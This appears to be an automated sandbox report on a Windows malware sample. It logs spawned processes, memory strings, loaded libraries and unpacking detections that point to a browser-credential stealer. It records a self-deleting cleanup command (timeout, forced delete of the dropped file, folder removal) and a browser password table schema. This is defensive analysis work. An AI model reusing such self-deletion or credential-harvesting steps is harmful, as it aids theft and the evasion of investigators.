                    Source: softokn3[1].dll.12.drBinary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
                    Source: katDDA4.tmp, 0000000C.00000002.2545008944.000000001DDD8000.00000002.00001000.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000002.2547833038.000000002021C000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000002.2587384394.000000006D1EF000.00000002.00000001.01000000.0000000C.sdmp, nss3.dll.12.dr, sqls[1].dll.12.dr, nss3[1].dll.12.drBinary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                    Source: softokn3[1].dll.12.drBinary or memory string: SELECT ALL * FROM %s LIMIT 0;
                    Source: katDDA4.tmp, 0000000C.00000002.2545008944.000000001DDD8000.00000002.00001000.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000002.2547833038.000000002021C000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000002.2587384394.000000006D1EF000.00000002.00000001.01000000.0000000C.sdmp, nss3.dll.12.dr, sqls[1].dll.12.dr, nss3[1].dll.12.drBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
                    Source: katDDA4.tmp, 0000000C.00000002.2545008944.000000001DDD8000.00000002.00001000.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000002.2547833038.000000002021C000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000002.2587384394.000000006D1EF000.00000002.00000001.01000000.0000000C.sdmp, nss3.dll.12.dr, sqls[1].dll.12.dr, nss3[1].dll.12.drBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
                    Source: katDDA4.tmp, 0000000C.00000002.2545008944.000000001DDD8000.00000002.00001000.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000002.2547833038.000000002021C000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000002.2587384394.000000006D1EF000.00000002.00000001.01000000.0000000C.sdmp, nss3.dll.12.dr, sqls[1].dll.12.dr, nss3[1].dll.12.drBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
                    Source: softokn3[1].dll.12.drBinary or memory string: UPDATE %s SET %s WHERE id=$ID;
                    Source: katDDA4.tmp, 0000000C.00000002.2545008944.000000001DDD8000.00000002.00001000.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000002.2547833038.000000002021C000.00000004.00000020.00020000.00000000.sdmp, sqls[1].dll.12.drBinary or memory string: INSERT INTO "%w"."%w"("%w") VALUES('integrity-check');
                    Source: softokn3[1].dll.12.drBinary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
                    Source: softokn3[1].dll.12.drBinary or memory string: SELECT ALL id FROM %s WHERE %s;
                    Source: softokn3[1].dll.12.drBinary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
                    Source: katDDA4.tmp, 0000000C.00000002.2545008944.000000001DDD8000.00000002.00001000.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000002.2547833038.000000002021C000.00000004.00000020.00020000.00000000.sdmp, sqls[1].dll.12.drBinary or memory string: CREATE TABLE IF NOT EXISTS %s.'rbu_tmp_%q' AS SELECT *%s FROM '%q' WHERE 0;
                    Source: softokn3[1].dll.12.drBinary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
                    Source: katDDA4.tmp, katDDA4.tmp, 0000000C.00000002.2545008944.000000001DDD8000.00000002.00001000.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000002.2547833038.000000002021C000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000002.2587384394.000000006D1EF000.00000002.00000001.01000000.0000000C.sdmp, nss3.dll.12.dr, sqls[1].dll.12.dr, nss3[1].dll.12.drBinary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
                    Source: katDDA4.tmp, 0000000C.00000002.2545008944.000000001DDD8000.00000002.00001000.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000002.2547833038.000000002021C000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000002.2587384394.000000006D1EF000.00000002.00000001.01000000.0000000C.sdmp, nss3.dll.12.dr, sqls[1].dll.12.dr, nss3[1].dll.12.drBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
                    Source: softokn3[1].dll.12.drBinary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
                    Source: katDDA4.tmp, 0000000C.00000002.2545008944.000000001DDD8000.00000002.00001000.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000002.2547833038.000000002021C000.00000004.00000020.00020000.00000000.sdmp, sqls[1].dll.12.drBinary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,nexec INT,ncycle INT,stmt HIDDEN);
                    Source: 5876.exe, 00000007.00000003.1760839883.0000000002C8B000.00000004.00000800.00020000.00000000.sdmp, 5876.exe, 00000007.00000003.1744609509.0000000002C75000.00000004.00000800.00020000.00000000.sdmp, 5876.exe, 00000007.00000003.1743544115.0000000002C94000.00000004.00000800.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2250873454.0000000000A2B000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2250873454.0000000000A28000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2233073953.00000000009D6000.00000004.00000020.00020000.00000000.sdmp, GIEBAE.12.dr, BFIIID.12.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                    Source: katDDA4.tmp, 0000000C.00000002.2545008944.000000001DDD8000.00000002.00001000.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000002.2547833038.000000002021C000.00000004.00000020.00020000.00000000.sdmp, sqls[1].dll.12.drBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
                    Source: softokn3[1].dll.12.drBinary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
                    Source: katDDA4.tmp, 0000000C.00000002.2545008944.000000001DDD8000.00000002.00001000.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000002.2547833038.000000002021C000.00000004.00000020.00020000.00000000.sdmp, sqls[1].dll.12.drBinary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
                    Source: softokn3[1].dll.12.drBinary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;
                    Source: xvJv1BpknZ.exeVirustotal: Detection: 34%
                    Source: unknownProcess created: C:\Users\user\Desktop\xvJv1BpknZ.exe "C:\Users\user\Desktop\xvJv1BpknZ.exe"
                    Source: unknownProcess created: C:\Users\user\AppData\Roaming\etrtabd C:\Users\user\AppData\Roaming\etrtabd
                    Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\5876.exe C:\Users\user\AppData\Local\Temp\5876.exe
                    Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\EE6.exe C:\Users\user\AppData\Local\Temp\EE6.exe
                    Source: C:\Users\user\AppData\Local\Temp\EE6.exeProcess created: C:\Users\user\AppData\Local\Temp\katDDA4.tmp C:\Users\user\AppData\Local\Temp\katDDA4.tmp
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7992 -s 468
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\AppData\Local\Temp\katDDA4.tmp" & rd /s /q "C:\ProgramData\FBGIDHCAAKEB" & exit
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
                    Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\5876.exe C:\Users\user\AppData\Local\Temp\5876.exeJump to behavior
                    Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\EE6.exe C:\Users\user\AppData\Local\Temp\EE6.exeJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\EE6.exeProcess created: C:\Users\user\AppData\Local\Temp\katDDA4.tmp C:\Users\user\AppData\Local\Temp\katDDA4.tmpJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\AppData\Local\Temp\katDDA4.tmp" & rd /s /q "C:\ProgramData\FBGIDHCAAKEB" & exitJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
                    Source: C:\Users\user\Desktop\xvJv1BpknZ.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\xvJv1BpknZ.exeSection loaded: msimg32.dllJump to behavior
                    Source: C:\Users\user\Desktop\xvJv1BpknZ.exeSection loaded: msvcr100.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: windows.cloudstore.schema.shell.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: taskschd.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: webio.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: mfsrcsnk.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: windows.internal.shell.broker.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: vcruntime140_1.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: vcruntime140.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: msvcp140.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: vcruntime140.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\etrtabdSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\etrtabdSection loaded: msimg32.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\etrtabdSection loaded: msvcr100.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeSection loaded: msimg32.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeSection loaded: msvcr100.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeSection loaded: webio.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\EE6.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\EE6.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\EE6.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\EE6.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\EE6.exeSection loaded: textshaping.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpSection loaded: rstrtmgr.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpSection loaded: dbghelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpSection loaded: schannel.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpSection loaded: dpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpSection loaded: sxs.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpSection loaded: mozglue.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpSection loaded: wsock32.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpSection loaded: vcruntime140.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpSection loaded: msvcp140.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpSection loaded: vcruntime140.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpSection loaded: windowscodecs.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpSection loaded: windows.fileexplorer.common.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpSection loaded: ntshrui.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpSection loaded: linkinfo.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpSection loaded: dlnashext.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpSection loaded: wpdshext.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpSection loaded: appresolver.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpSection loaded: slc.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpSection loaded: sppc.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpSection loaded: pcacli.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpSection loaded: mpr.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpSection loaded: sfc_os.dllJump to behavior
                    Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dll
                    Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{603D3801-BD81-11d0-A3A5-00C04FD706EC}\InProcServer32Jump to behavior
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: C:\Users\user\Desktop\xvJv1BpknZ.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
                    Source: Binary string: mozglue.pdbP source: katDDA4.tmp, 0000000C.00000002.2589136080.000000006E6CD000.00000002.00000001.01000000.0000000D.sdmp, mozglue[1].dll.12.dr
                    Source: Binary string: freebl3.pdb source: freebl3[1].dll.12.dr, freebl3.dll.12.dr
                    Source: Binary string: freebl3.pdbp source: freebl3[1].dll.12.dr, freebl3.dll.12.dr
                    Source: Binary string: nss3.pdb@ source: katDDA4.tmp, 0000000C.00000002.2587384394.000000006D1EF000.00000002.00000001.01000000.0000000C.sdmp, nss3.dll.12.dr, nss3[1].dll.12.dr
                    Source: Binary string: softokn3.pdb@ source: softokn3[1].dll.12.dr
                    Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140[1].dll.12.dr, vcruntime140.dll.12.dr
                    Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140.dll.12.dr, msvcp140[1].dll.12.dr
                    Source: Binary string: nss3.pdb source: katDDA4.tmp, 0000000C.00000002.2587384394.000000006D1EF000.00000002.00000001.01000000.0000000C.sdmp, nss3.dll.12.dr, nss3[1].dll.12.dr
                    Source: Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: katDDA4.tmp, 0000000C.00000002.2545008944.000000001DDD8000.00000002.00001000.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000002.2547833038.000000002021C000.00000004.00000020.00020000.00000000.sdmp, sqls[1].dll.12.dr
                    Source: Binary string: mozglue.pdb source: katDDA4.tmp, 0000000C.00000002.2589136080.000000006E6CD000.00000002.00000001.01000000.0000000D.sdmp, mozglue[1].dll.12.dr
                    Source: Binary string: softokn3.pdb source: softokn3[1].dll.12.dr

                    Data Obfuscation

                    barindex
                    Detected unpacking (changes PE section rights)
                    Source: C:\Users\user\Desktop\xvJv1BpknZ.exeUnpacked PE file: 0.2.xvJv1BpknZ.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:EW;
                    Source: C:\Users\user\AppData\Roaming\etrtabdUnpacked PE file: 6.2.etrtabd.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:EW;
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeUnpacked PE file: 7.2.5876.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
                    Detected unpacking (overwrites its own PE header)
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeUnpacked PE file: 7.2.5876.exe.400000.0.unpack
                    Source: sqls[1].dll.12.drStatic PE information: section name: .00cfg
                    Source: freebl3.dll.12.drStatic PE information: section name: .00cfg
                    Source: freebl3[1].dll.12.drStatic PE information: section name: .00cfg
                    Source: mozglue.dll.12.drStatic PE information: section name: .00cfg
                    Source: mozglue[1].dll.12.drStatic PE information: section name: .00cfg
                    Source: msvcp140.dll.12.drStatic PE information: section name: .didat
                    Source: msvcp140[1].dll.12.drStatic PE information: section name: .didat
                    Source: nss3.dll.12.drStatic PE information: section name: .00cfg
                    Source: nss3[1].dll.12.drStatic PE information: section name: .00cfg
                    Source: softokn3.dll.12.drStatic PE information: section name: .00cfg
                    Source: softokn3[1].dll.12.drStatic PE information: section name: .00cfg
                    Source: C:\Users\user\Desktop\xvJv1BpknZ.exeCode function: 0_2_00402CD7 push cs; retf 0_2_00402CD8
                    Source: C:\Users\user\Desktop\xvJv1BpknZ.exeCode function: 0_2_00401EA7 push 0000000Eh; retf 0038h0_2_00401EB6
                    Source: C:\Users\user\Desktop\xvJv1BpknZ.exeCode function: 0_2_004033B6 push eax; ret 0_2_00403419
                    Source: C:\Users\user\Desktop\xvJv1BpknZ.exeCode function: 0_2_02111F0E push 0000000Eh; retf 0038h0_2_02111F1D
                    Source: C:\Users\user\Desktop\xvJv1BpknZ.exeCode function: 0_2_02112D3E push cs; retf 0_2_02112D3F
                    Source: C:\Users\user\Desktop\xvJv1BpknZ.exeCode function: 0_2_02153622 push edx; retf 0_2_02153626
                    Source: C:\Users\user\Desktop\xvJv1BpknZ.exeCode function: 0_2_0215795A push 0000000Eh; retf 0038h0_2_02157969
                    Source: C:\Users\user\Desktop\xvJv1BpknZ.exeCode function: 0_2_02158B40 push eax; ret 0_2_02158B41
                    Source: C:\Users\user\Desktop\xvJv1BpknZ.exeCode function: 0_2_0215D996 push 0000002Ah; iretd 0_2_0215D9E0
                    Source: C:\Users\user\Desktop\xvJv1BpknZ.exeCode function: 0_2_021574B7 push ss; iretw 0_2_021574C9
                    Source: C:\Users\user\Desktop\xvJv1BpknZ.exeCode function: 0_2_021584CC push cs; retf 0_2_021584CD
                    Source: C:\Users\user\Desktop\xvJv1BpknZ.exeCode function: 0_2_021578EA push cs; retf 0038h0_2_02157969
                    Source: C:\Users\user\AppData\Roaming\etrtabdCode function: 6_2_00402CD7 push cs; retf 6_2_00402CD8
                    Source: C:\Users\user\AppData\Roaming\etrtabdCode function: 6_2_00401EA7 push 0000000Eh; retf 0038h6_2_00401EB6
                    Source: C:\Users\user\AppData\Roaming\etrtabdCode function: 6_2_004033B6 push eax; ret 6_2_00403419
                    Source: C:\Users\user\AppData\Roaming\etrtabdCode function: 6_2_020C1F0E push 0000000Eh; retf 0038h6_2_020C1F1D
                    Source: C:\Users\user\AppData\Roaming\etrtabdCode function: 6_2_020C2D3E push cs; retf 6_2_020C2D3F
                    Source: C:\Users\user\AppData\Roaming\etrtabdCode function: 6_2_02203927 push edx; retf 6_2_02203BC6
                    Source: C:\Users\user\AppData\Roaming\etrtabdCode function: 6_2_0220DF36 push 0000002Ah; iretd 6_2_0220DF80
                    Source: C:\Users\user\AppData\Roaming\etrtabdCode function: 6_2_02208A6C push cs; retf 6_2_02208A6D
                    Source: C:\Users\user\AppData\Roaming\etrtabdCode function: 6_2_02207A57 push ss; iretw 6_2_02207A69
                    Source: C:\Users\user\AppData\Roaming\etrtabdCode function: 6_2_02207E8A push cs; retf 0038h6_2_02207F09
                    Source: C:\Users\user\AppData\Roaming\etrtabdCode function: 6_2_022090E0 push eax; ret 6_2_022090E1
                    Source: C:\Users\user\AppData\Roaming\etrtabdCode function: 6_2_02207EFA push 0000000Eh; retf 0038h6_2_02207F09
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeCode function: 7_2_0214030D push ecx; ret 7_2_02140315
                    Source: C:\Users\user\AppData\Local\Temp\EE6.exeCode function: 11_2_0427B010 push edx; ret 11_2_0427B21F
                    Source: C:\Users\user\AppData\Local\Temp\EE6.exeCode function: 11_2_0427A910 push edx; ret 11_2_0427A91B
                    Source: C:\Users\user\AppData\Local\Temp\EE6.exeFile created: C:\Users\user\AppData\Local\Temp\katDDA4.tmpJump to dropped file
